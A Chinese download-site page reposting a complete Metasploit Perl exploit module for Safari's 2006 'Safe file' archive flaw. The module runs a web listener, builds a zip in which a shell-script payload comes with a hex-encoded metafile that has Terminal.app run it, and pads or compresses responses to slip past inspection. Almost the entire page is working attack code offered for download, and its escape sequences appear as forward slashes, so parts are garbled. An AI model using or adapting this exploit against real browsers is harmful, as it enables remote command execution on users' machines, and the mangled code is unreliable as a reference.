 |
|
 |
您现在的位置: 精品下载 >> 安全 >> 网络安全 >> 安全中心正文 |  用户登录  新用户注册 |
|
||||
| Apple Mac OS X / Safari __MACOSX ZIP Archive Remote Code Execution Exploit | ||||
| 作者:佚名 安全中心来源:不详 点击数: 更新时间:2007-10-10 | ||||
# This file is part of the Metasploit Framework and may be redistributed # according to the licenses defined in the Authors field below. In the # case of an unknown or missing license, this file defaults to the same # license as the core Framework (dual GPLv2 and Artistic). The latest # version of the Framework can always be obtained from metasploit.com. ## package Msf::Exploit::safari_safefiles_exec; use strict; use base "Msf::Exploit"; use Pex::Text; use IO::Socket::INET; use IPC::Open3; use FindBin qw; my $advanced = { 'Gzip' => [1, 'Enable gzip content encoding'], 'Chunked' => [1, 'Enable chunked transfer encoding'], }; my $info = { 'Name' => 'Safari Archive Metadata Command Execution', 'Version' => '$Revision: 1.3 $', 'Authors' => [ 'H D Moore <hdm [at] metasploit.com', ], 'Description' => Pex::Text::Freeform(qq{ This module exploits a vulnerability in Safari's "Safe file" feature, which will automatically open any file with one of the allowed extensions. This can be abused by supplying a zip file, containing a shell script, with a metafile indicating that the file should be opened by Terminal.app. This module depends on the 'zip' command-line utility. }), 'Arch' => [ ], 'OS' => [ ], 'Priv' => 0, 'UserOpts' => { 'HTTPPORT' => [ 1, 'PORT', 'The local HTTP listener port', 8080 ], 'HTTPHOST' => [ 0, 'HOST', 'The local HTTP listener host', "0.0.0.0" ], 'REALHOST' => [ 0, 'HOST', 'External address to use for redirects (NAT)' ], }, 'Payload' => { 'Space' => 8000, 'MinNops' => 0, 'MaxNops' => 0, 'Keys' => ['cmd', 'cmd_bash'], }, 'Refs' => [ ['URL', 'http://www.heise.de/english/newsticker/news/69862'], ['BID', '16736'], ], 'DefaultTarget' => 0, 'Targets' => [ [ 'Automatic' ] ], 'Keys' => [ 'safari' ], 'DisclosureDate' => 'Feb 21 2006', }; sub new { my $class = shift; my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_); return($self); } sub Exploit { my $self = shift; my $server = IO::Socket::INET->new( LocalHost => $self->GetVar('HTTPHOST'), LocalPort => $self->GetVar('HTTPPORT'), ReuseAddr => 1, Listen => 1, Proto => 'tcp' ); my $client; # Did the listener create fail? if (not defined($server)) { $self->PrintLine("[-] Failed to create local HTTP listener on " . $self->GetVar('HTTPPORT')); return; } my $httphost = $self->GetVar('HTTPHOST'); $httphost = Pex::Utils::SourceIP('1.2.3.4') if $httphost eq '0.0.0.0'; $self->PrintLine("[*] Waiting for connections to http://". $httphost .":". $self->GetVar('HTTPPORT') ."/"); while (defined($client = $server->accept())) { $self->HandleHttpClient(Msf::Socket::Tcp->new_from_socket($client)); } return; } sub HandleHttpClient { my $self = shift; my $fd = shift; # Set the remote host information my ($rport, $rhost) = ($fd->PeerPort, $fd->PeerAddr); # Read the HTTP command my ($cmd, $url, $proto) = split(/ /, $fd->RecvLine(10), 3); my $agent; # Read in the HTTP headers while ((my $line = $fd->RecvLine(10))) { $line =~ s/^/s+|/s+$//g; my ($var, $val) = split(//:/, $line, 2); # Break out if we reach the end of the headers last if (not defined($var) or not defined($val)); $agent = $val if $var =~ /User-Agent/i; } my $target = $self->Targets->[$self->GetVar('TARGET')]; my $shellcode = $self->GetVar('EncodedPayload')->RawPayload; my $content = $self->CreateZip($shellcode) || return; $self->PrintLine("[*] HTTP Client connected from $rhost:$rport, sending ".length($shellcode)." bytes of payload..."); $fd->Send($self->BuildResponse($content)); select(undef, undef, undef, 0.1); $fd->Close(); } sub RandomHeaders { my $self = shift; my $head = ''; while (length($head) < 3072) { $head .= "X-" . Pex::Text::AlphaNumText(int(rand(30) + 5)) . ': ' . Pex::Text::AlphaNumText(int(rand(256) + 5)) ."/r/n"; } return $head; } sub BuildResponse { my ($self, $content) = @_; my $response = "HTTP/1.1 200 OK/r/n" . $self->RandomHeaders() . "Content-Type: application/zip/r/n"; if ($self->GetVar('Gzip')) { $response .= "Content-Encoding: gzip/r/n"; $content = $self->Gzip($content); } if ($self->GetVar('Chunked')) { $response .= "Transfer-Encoding: chunked/r/n"; $content = $self->Chunk($content); } else { $response .= 'Content-Length: ' . length($content) . "/r/n" . "Connection: close/r/n"; } $response .= "/r/n" . $content; return $response; } sub Chunk { my ($self, $content) = @_; my $chunked; while (length($content)) { my $chunk = substr($content, 0, int(rand(10) + 1), ''); $chunked .= sprintf('%x', length($chunk)) . "/r/n$chunk/r/n"; } $chunked .= "0/r/n/r/n"; return $chunked; } sub Gzip { my $self = shift; my $data = shift; my $comp = int(rand(5))+5; my($wtr, $rdr, $err); my $pid = open3($wtr, $rdr, $err, 'gzip', '-'.$comp, '-c', '--force'); print $wtr $data; close ($wtr); local $/; return (<$rdr>); } # Lame! sub CreateZip { my $self = shift; my $cmds = shift; my $data = $cmds."/n"; my $name = Pex::Text::AlphaNumText(int(rand(10)+4)).".mov"; my $temp = ($ENV || $RealBin || "/tmp") . "/msf_safari_temp_".Pex::Text::AlphaNumText(16); if ($self->GotZip != 0) { $self->PrintLine("[*] Could not execute the zip command (or zip returned an error)"); return; } if (! mkdir($temp,0755)) { $self->PrintLine("[*] Could not create a temporary directory: $!"); return; } if (! chdir($temp)) { $self->PrintLine("[*] Could not change into temporary directory: $!"); $self->Nuke($temp); return; } if (! mkdir("$temp/__MACOSX",0755)) { $self->PrintLine("[*] Could not create the MACOSX temporary directory: $!"); return $self->Nuke($temp); return; } if (! open(TMP, ">$temp/$name")) { $self->PrintLine("[*] Could not create the shell script: $!"); $self->Nuke($temp); return; } print TMP $data; close(TMP); # This is important :) chmod(0755, "$temp/$name"); if (! open(TMP, ">$temp/__MACOSX/._".$name)) { $self->PrintLine("[*] Could not create the metafile: $!"); $self->Nuke($temp); return; } print TMP $self->OSXMetaFile; close(TMP); system("zip", "exploit.zip", $name, "__MACOSX/._".$name); if( ! open(TMP, "<"."exploit.zip")) { $self->PrintLine("[*] Failed to create exploit.zip (weird zip command?)"); $self->Nuke($temp); return; } my $xzip; while (<TMP>) { $xzip .= $_ } close (TMP); $self->Nuke($temp); return $xzip; } sub Nuke { my $self = shift; my $temp = shift; system("rm", "-rf", $temp); return; } sub GotZip { return system("zip -h >/dev/null 2>&1"); } sub OSXMetaFile { return "/x00/x05/x16/x07/x00/x02/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00". "/x00/x00/x00/x00/x00/x00/x00/x00/x00/x02/x00/x00/x00/x09/x00/x00". "/x00/x32/x00/x00/x00/x20/x00/x00/x00/x02/x00/x00/x00/x52/x00/x00". "/x05/x3a/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00". "/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00". "/x00/x00/x00/x00/x01/x00/x00/x00/x05/x08/x00/x00/x04/x08/x00/x00". "/x00/x32/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00". "/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00". "/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00". "/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00". "/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00". "/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00". "/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00". "/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00". "/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00". "/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00". "/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00". "/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00". "/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00". "/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00". "/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00". "/x00/x00/x00/x00/x04/x04/x00/x00/x00/x25/x2f/x41/x70/x70/x6c/x69". "/x63/x61/x74/x69/x6f/x6e/x73/x2f/x55/x74/x69/x6c/x69/x74/x69/x65". "/x73/x2f/x54/x65/x72/x6d/x69/x6e/x61/x6c/x2e/x61/x70/x70/x00/xec". "/xec/xec/xff/xec/xec/xec/xff/xec/xec/xec/xff/xec/xec/xec/xff/xec". "/xec/xec/xff/xec/xec/xec/xff/xe1/xe1/xe1/xff/xe1/xe1/xe1/xff/xe1". "/xe1/xe1/xff/xe1/xe1/xe1/xff/xe1/xe1/xe1/xff/xe1/xe1/xe1/xff/xe1". "/xe1/xe1/xff/xe1/xe1/xe1/xff/xe6/xe6/xe6/xff/xe6/xe6/xe6/xff/xe6". "/xe6/xe6/xff/xe6/xe6/xe6/xff/xe6/xe6/xe6/xff/xe6/xe6/xe6/xff/xe6". "/xe6/xe6/xff/xe6/xe6/xe6/xff/xe9/xe9/xe9/xff/xe9/xe9/xe9/xff/xe9". "/xe9/xe9/xff/xe9/xe9/xe9/xff/xe9/xe9/xe9/xff/xe9/xe9/xe9/xff/xe9". "/xe9/xe9/xff/xe9/xe9/xe9/xff/xec/xec/xec/xff/xec/xec/xec/xff/xec". "/xec/xec/xff/xec/xec/xec/xff/xec/xec/xec/xff/xec/xec/xec/xff/xec". "/xec/xec/xff/xec/xec/xec/xff/xef/xef/xef/xff/xef/xef/xef/xff/xef". "/xef/xef/xff/xef/xef/xef/xff/xef/xef/xef/xff/xef/xef/xef/xff/xef". "/xef/xef/xff/xef/xef/xef/xff/xf3/xf3/xf3/xff/xf3/xf3/xf3/xff/xf3". "/xf3/xf3/xff/xf3/xf3/xf3/xff/xf3/xf3/xf3/xff/xf3/xf3/xf3/xff/xf3". "/xf3/xf3/xff/xf3/xf3/xf3/xff/xf6/xf6/xf6/xff/xf6/xf6/xf6/xff/xf6". "/xf6/xf6/xff/xf6/xf6/xf6/xff/xf6/xf6/xf6/xff/xf6/xf6/xf6/xff/xf6". "/xf6/xf6/xff/xf6/xf6/xf6/xff/xf8/xf8/xf8/xff/xf8/xf8/xf8/xff/xf8". "/xf8/xf8/xff/xf8/xf8/xf8/xff/xf8/xf8/xf8/xff/xf8/xf8/xf8/xff/xf8". "/xf8/xf8/xff/xf8/xf8/xf8/xff/xfc/xfc/xfc/xff/xfc/xfc/xfc/xff/xfc". "/xfc/xfc/xff/xfc/xfc/xfc/xff/xfc/xfc/xfc/xff/xfc/xfc/xfc/xff/xfc". "/xfc/xfc/xff/xfc/xfc/xfc/xff/xff/xff/xff/xff/xff/xff/xff/xff/xff". "/xff/xff/xff/xff/xff/xff/xff/xff/xff/xff/xff/xff/xff/xff/xff/xff". "/xff/xff/xff/xff/xff/xff/xff/xff/xff/xff/xff/xff/xff/xff/xff/xff". "/xff/xff/xff/xff/xff/xff/xff/xff/xff/xff/xff/xff/xff/xff/xff/xff". "/xff/xff/xff/xff/xff/xff/xa8/x00/x00/x00/xa8/x00/x00/x00/xa8/x00". "/x00/x00/xa8/x00/x00/x00/xa8/x00/x00/x00/xa8/x00/x00/x00/xa8/x00". "/x00/x00/xa8/x00/x00/x00/x2a/x00/x00/x00/x2a/x00/x00/x00/x2a/x00". "/x00/x00/x2a/x00/x00/x00/x2a/x00/x00/x00/x2a/x00/x00/x00/x2a/x00". "/x00/x00/x2a/x00/x00/x00/x03/x00/x00/x00/x03/x00/x00/x00/x03/x00". "/x00/x00/x03/x00/x00/x00/x03/x00/x00/x00/x03/x00/x00/x00/x03/x00". "/x00/x00/x03/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00". "/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00". "/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00". "/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00". "/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00". "/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00". "/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00". "/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00". "/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00". "/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00". "/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00". "/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00". "/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00". "/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00". "/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00". "/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00". "/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00". "/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00". "/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00". "/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00". "/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00". "/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00". "/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00". "/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00". "/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00". "/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00". "/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00". "/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00". "/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00". "/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00". "/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00". "/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00". "/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x00/x01/x00/x00/x00". "/x05/x08/x00/x00/x04/x08/x00/x00/x00/x32/x00/x5f/xd0/xac/x12/xc2". "/x00/x00/x00/x1c/x00/x32/x00/x00/x75/x73/x72/x6f/x00/x00/x00/x0a". "/x00/x00/xff/xff/x00/x00/x00/x00/x01/x0d/x21/x7c"; } 1; |
网友评论:(只显示最新10条。评论内容只代表网友观点,与本站立场无关!)